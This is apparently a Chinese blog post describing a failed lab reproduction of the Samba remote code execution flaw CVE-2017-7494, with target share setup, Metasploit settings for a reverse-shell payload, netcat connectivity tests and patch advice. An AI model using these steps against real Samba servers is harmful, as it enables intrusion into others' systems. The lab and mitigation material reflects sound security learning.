linux smb 漏洞_Samba远程代码执行漏洞(CVE-2017-7494)

最新推荐文章于 2024-04-02 19:00:00 发布
最新推荐文章于 2024-04-02 19:00:00 发布
阅读量984 收藏 2
点赞数 1
文章标签: linux smb 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35241774/article/details/111887482
版权

我自横刀向天笑 去留肝胆两昆仑

原本想复现一下CVE-2017-7494漏洞再分享出来的,没曾想过程一波三折,结果还铩羽而归。诶,还是在此记录一下失败的复现过程吧,为了纪念一下折腾不止的岁月,还有原谅我没有最终复现成功-!-。

关于此漏洞的介绍不用多说,可以移步Samba远程代码执行漏洞|Freebuf。Samba远程代码执行漏洞被业内称为linux版的永恒之蓝,危害可想而知。当然相比windows来说,linux下的445端口是默认关闭的,而有些版本的linux并没有自带samba软件,算是万幸。

漏洞影响版本

Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。

漏洞利用条件服务器打开了文件/打印机共享端口445

共享文件拥有访问以及写入权限

攻击者知道共享的目录路径

目前测试发现匿名登录与需要账号密码登录的情况都可以成功执行此漏洞,当然设置了账号密码的,在攻击时需要提供正确的账号密码。

漏洞利用原理

攻击者可通过上传恶意的链接库文件(.so),使服务端程序加载并执行它,从而实现远程代码执行。

EXP

MSF已经更新了此漏洞的利用模块,链接:is_known_pipename.rb

另外国外大牛也用python写了个利用脚本(exp):42060.py

复现的坑

想要复现此漏洞,首先得搭建一个靶机(不建议找公网的机子测试)。于是我找了台ubuntu服务器(14.04.1-Ubuntu),此版本默认安装了samba(Version 4.3.11-Ubuntu)省去了一些安装的麻烦,那么接下来就是要配置samba。

首先创建一个目录用于共享

1mkdir /home/share

然后设置权限(若不设置权限,用户将会没有写权限)

1chmod 777 /home/share

最后修改samba配置文件:

1vim /etc/samba/smb.conf

在文件最后添加一下内容:

1

2

3

4

5

6[myshare]

comment=smb share test

browseable=yes #可读

writeable=yes #可写

path=/home/share #设置目录(上一步创建的共享目录)

public = yes #允许匿名登录

开启samba服务

1

2

3/etc/init.d/smbd start #开启

/etc/init.d/smbd stop #关闭

/etc/init.d/smbd restart #重启

开启后,尝试远程访问一下:\\ip,经过测试我发现可以匿名登录,登录以后也有写权限。

靶机搭建完毕,接下来就开启MSF神器吧。

MAC10.11版本不支持最新版MSF

首先我在MAC上更新了msf,直接敲命令:msfupdate,没过多久更新成功了,于是我准备启动msf,输入命令:msfconsole,结果报错了(一脸懵逼,早知道就加载exploit文件就行了)。

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18dyld: lazy symbol binding failed: Symbol not found: _clock_gettime

Referenced from: /opt/metasploit-framework/embedded/lib/libruby.2.4.1.dylib (which was built for Mac OS X 10.12)

Expected in: /usr/lib/libSystem.B.dylib

dyld: Symbol not found: _clock_gettime

Referenced from: /opt/metasploit-framework/embedded/lib/libruby.2.4.1.dylib (which was built for Mac OS X 10.12)

Expected in: /usr/lib/libSystem.B.dylib

/opt/metasploit-framework/bin/msfdb: line 23: 4721 Trace/BPT trap: 5 ruby "$INSTALL_DIR/embedded/framework/msfdb" "$@"

dyld: lazy symbol binding failed: Symbol not found: _clock_gettime

Referenced from: /opt/metasploit-framework/embedded/lib/libruby.2.4.1.dylib (which was built for Mac OS X 10.12)

Expected in: /usr/lib/libSystem.B.dylib

dyld: Symbol not found: _clock_gettime

Referenced from: /opt/metasploit-framework/embedded/lib/libruby.2.4.1.dylib (which was built for Mac OS X 10.12)

Expected in: /usr/lib/libSystem.B.dylib

/opt/metasploit-framework/bin/msfconsole: line 123: 4725 Trace/BPT trap: 5 $BIN/ruby $FRAMEWORK/$cmd $db_args "$@"

本人第一次碰见这个报错,于是只能上google查找解决方案,翻查一会在Github的Issues中发现了这个错误,错误原因是mac10.11版本不支持最新版的msf,需要将mac升级到10.12然后升级xcode。此时我的心情是崩溃的,首先我的是黑苹果,好不容易安装10.11成功了,想要突破到10.12谈何容易,其次msf已经被我升级了,怎么回退啊请问!

注:其实不需要利用msfupdate更新msf,即使更新了也要自己加载exploit模块,因此只需要将is_known_pipename.rb文件放到msf的modules目录下即可。(当时sb了)

Payload无法加载?

舒缓心情后,继续折腾,那么既然mac上的msf不能用了,我就只能开一个虚拟机,好在之前虚拟机里面安装过kali,因此这回直接可以用了。打开kali后,我原本也想用msfupdate更新msf到最新版,但想想其实主要就是下载那个sabma漏洞的利用脚本。为了俭省时间,我直接去github上下载了is_known_pipename.rb,然后扔进了/usr/share/metasploit-framework/modules/exploits/linux/samba/目录下。然而当我运行msfconsole,加载is_known_pipename模块后,发现没有payload模块可以选择,因此攻击不能成功。

Session回连失败

事实证明当时是我打错了,应该不存在payload无法加载的问题。等我成功加载了此模块以及payload,也设置好参数了,可悲剧的事情又发生了,exploit实施攻击后,向靶机写入文件成功了,但是没有回链session。

MSF参数设置:

1

2

3

4set rhost 172.16.1.2

set smb_share_base /home/nmask/share

set payload generic/shell_reverse_tcp

exploit

Exploit后回显的部分信息:

1Exploit completed,but no session was created

查看共享文件夹,已经成功生成.so文件:

靶机网络问题or匿名登录问题?

起初我以为是匿名登录的原因,于是设置了samba账号密码,并且在msf上也设置了SMBPass与SMBUser。

靶机上配置

修改配置文件

1

2

3

4

5

6[myshare]

comment=smb share test

browseable=yes #可读

writeable=yes #可写

path=/home/share #设置目录(上一步创建的共享目录)

public = no #不允许匿名登录

在 [global] 设置选项中添加配置

1security = user

命令行添加用户

1

2

3useradd smbuser

smbpasswd -a smbuser

/etc/init.d/restart

注意以上添加的用户一定要是linux上存在的用户。

kali上配置1

2set SMBUser username

set SMBPass password

然而最终session仍然没有成功创建,然后我怀疑是靶机无法直接连接虚拟机监听的端口,于是用nc进行了测试。

虚拟机(kali)

1nc -vv -l -p 4444

靶机(Ubuntu 64位)

1nc 192.168.1.2 4444

最后的结果证明,靶机可以连通虚拟机的4444端口。

kali版本问题?

最后在逛tools时发现有表哥说此exp只适合64位的kali,虽然我不明白这跟kali的版本有毛关系,但事实是我的kali是32位的并且我没有复现成功。为了验证这一说法,我特意安装了64位的kali,然后将is_konwn_pipename.rb文件放到msf模块目录下,然而最终的结果还是没有成功,因此这个说法是不成立的。如果真的是对系统版本有要求,那也应该对靶机的环境有要求。

也许搭了个假的靶机

那么我想最终原因就肯定出在我搭建的靶机上了,回顾过程,并没有发现有什么问题,而且权限也都是有的,毕竟共享文件夹下已经生成了.so文件。好吧,我暂时无能为力了,为了复现一个漏洞,我容易吗我!?

修复方案打补丁

升级到Samba 4.6.4/4.5.10/4.4.14任意版本

在smb.conf的[global]板块中添加参数:nt pipe support = no 然后重启smbd服务。

复现成功的案例

RandomUnicorn
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞预警+Samba远程代码执行漏洞(CVE-2017-7494)
weixin_38884250的博客
05-26 599
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布的4.6.4版本修复了一个严重的远程代码执行漏洞漏洞编号为CVE-2017-7494,影响Samba 3.5.0 之后及4.6.4/4.5.10/4.4.14版本。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同
CVE-2017-7494 SambaCry 分析&复现
weixin_45209963的博客
04-02 1034
写这篇文章的起因是为了完成课程作业…实在是过于真实了闲话少说,其实我对这玩意也不能说很了解吧…只能硬着头写了。本文会结合部分samba代码分析、msf exploit分析和攻击数据包对比,希望能让大家对这一漏洞有一定的了解。
CVE-2017-7494漏洞的分析与复现(Linux永恒之蓝)
dgjkkhcf的博客
07-20 4394
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494漏洞影响了Samba3.5.0之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心和360信息安全部的GearTeam第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。...
iPhone调用MAC OS X上C/C++写的.dylib问题(一)
weixin_30487701的博客
03-27 323
发表于 2011 年 03 月 19 日 由 正正 Author 正正 Date 2011.03.02 10:19:00 转载请注明出处 正正博客 http://www.2009fly.com 刚刚入门,有不正确之处还望指正! 本来以为iPhone可以直接调用MAC OS X 上的BSD C library(.dylib),结果用otool工具查看到新建立的libHello...
CVE-2017-7494的复现(Linux永恒之蓝)
siaowei44的博客
07-02 8121
概述 该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 主要是利用smb上的反弹shell漏洞,进行远程代码执行 环境 靶机ip:192.168.74.161 ,os:centos7,应用:Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 攻击主机ip:192.168.74.168,os:kali2019,工具:msf ...
Samba漏洞详解
m0_64593235的博客
04-19 391
samba漏洞详解
CVE-2017-7494:SAMBA CVE-2017-7494漏洞远程漏洞利用
05-06
CVE-2017-7494 SAMBA CVE-2017-7494漏洞远程漏洞利用。细节此漏洞利用分为两个部分: 首先,它编译一个称为“ implant.c”的有效负载,并生成一个库(libimplantx32.so或libimplantx64.so),该库更改为root用户...
smb.rar_SMB_linux例程_samba_smb lin
09-23
标题中的"smb.rar_SMB_linux例程_samba_smb lin"暗示了这个压缩包包含的是关于在Linux环境下配置Samba服务器的示例文件,特别是`smb.conf`,这是Samba的主要配置文件。 在Linux下设置Samba服务器,你需要了解以下...
Linux环境下Samba远程代码执行漏洞探析.pdf
09-06
2017 年 5 月 24 日,Samba 发布了 4.6.4 版本,修复了一个严重的远程代码执行漏洞,编号 CVE-2017-7494。这是一个非常危险的漏洞,攻击者可以通过构造恶意动态链接库文件,执行任意代码,获取 Samba 的权限,并可能...
samba-latest.tar.gz_Linux 文件共享_samba
09-14
在标题“samba-latest.tar.gz_Linux 文件共享_samba”中,"samba-latest.tar.gz"是Samba最新版本的压缩包文件,通常包含了Samba服务器的所有源代码。"Linux 文件共享"则表明了Samba的主要功能是在Linux系统中实现...
linuxjichu.rar_dhcp_linux 讲义_linux 服务器_samba
09-21
本讲义主要涵盖了Linux中的DHCP(动态主机配置协议)服务、Samba服务器的配置以及Linux服务器上的Web服务基础。这些内容对于构建和管理高效、可靠的网络环境至关重要。 首先,DHCP是网络管理员在配置局域网时不可或...
mac上安装spark详细错误记录
qq_19400457的博客
01-10 2362
初次在mac上安装spark,遇到的坑详细记录下。 首先我下载的是spark-3.0.0-preview2-bin-hadoop2.7,scala版本是2.13.0的,安装完成运行程序,出现下面错误: Exception in thread “main” java.lang.NoSuchMethodError: scala.util.matching.Regex.(Ljava/lang/Strin...
Mac下安装OpenCV2 for Python 3.7
scottfan的博客
04-04 1691
Mac下安装OpenCV2 for Python 3.7 最近需要调试一个有关摄像头检测的Python程序,程序需要OpenCV这个库,所以需要在我的MAC上安装opencv-python。由于是第一次安装opencv-python,这一路遇到不少坑,经过一翻折腾(中途多次想到过一句话,从入门到放弃),最终还是看到了成功的标志,以下就是这其中的曲折过程。 首先,通过pip安装 opencv-p...
linux samba 漏洞 exp,smaba漏洞总结
weixin_39816448的博客
05-20 1736
由于我无法确定具体影响的具体版本,所以samba版本在4.6.4之下都视为有漏洞存在。1,Samba任意文件访问漏洞(CNA-2004-0815)漏洞简介Samba是一个开源/免费软件套件,为SMB / CIFS客户提供无缝文件和打印服务。远程利用Samba中的输入验证漏洞允许攻击者访问指定共享路径之外的文件和目录。漏洞利用条件漏洞使用了samba软件套件,通常在445端口或者139端口。影响版本...
Samba远程代码执行漏洞复现-CVE-2017-7494
weixin_48128812的博客
12-02 3049
一、概述 Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 二、漏洞影响版本 Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 三、漏洞利用条件 1、服务器打开了文件/打印机共享端口445 2、共享文件拥有访问以及写入权限 3、攻击者知道
EMPIRE BREAKOUT渗透记录
althumi的博客
12-17 379
代码】EMPIRE BREAKOUT渗透记录。
利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell
NatusVincere
04-02 677
use exploit/linux/samba/is_known_pipename(选择要使用的脚本)如果不知道靶机IP可以在靶机中输入ifconfig即可查看ip,一般eth0下的IP即为靶机IP。漏洞文件的位置在vulhub/samba/CVE-2017-7494下。search CVE-2017-7494(搜索漏洞编号,查找漏洞脚本)在该文件夹下右键打开控制台窗口,或者cd到该文件夹下。set rhost IP(设置为靶机的IP即可)。run(进行攻击),攻击完成后寻找flag。
使用 React 和 Redux 进行井字游戏并附带源代码.zip
最新发布
07-24
项目:使用 React 和 Redux 进行井字游戏并附带源代码 使用 react 和 redux 的井字游戏是一个简单的 react 项目。整个项目都是使用 react components 和redux制作的。游戏很简单,玩法也很多。要运行此项目,您必须先安装 NodeJS。 关于项目 井字游戏反应而 redux 是使用ReactJS开发的。说到这个游戏,它具有高级功能和游戏玩法。要运行此项目,首先,您必须安装费用到您的系统。然后运行npm安装然后开始运行npm开始。游戏启动后,您可以选择不同的游戏选项。您还可以选择所需的网格框数量。此外,您还可以选择对手的类型。 要运行此项目,您需要 在计算机上安装NodeJS 并使用现代浏览器,例如 Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
"LINUX-SAMBA服务配置指南:实现跨系统文件共享
Linux系统中,SAMBA的配置文件通常是在/etc/samba/smb.conf路径下。可以使用文本编辑器打开该文件,修改其中的配置选项。可以设置工作组、共享名称、可访问用户等信息。配置文件中的注释也可以帮助理解各个选项的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值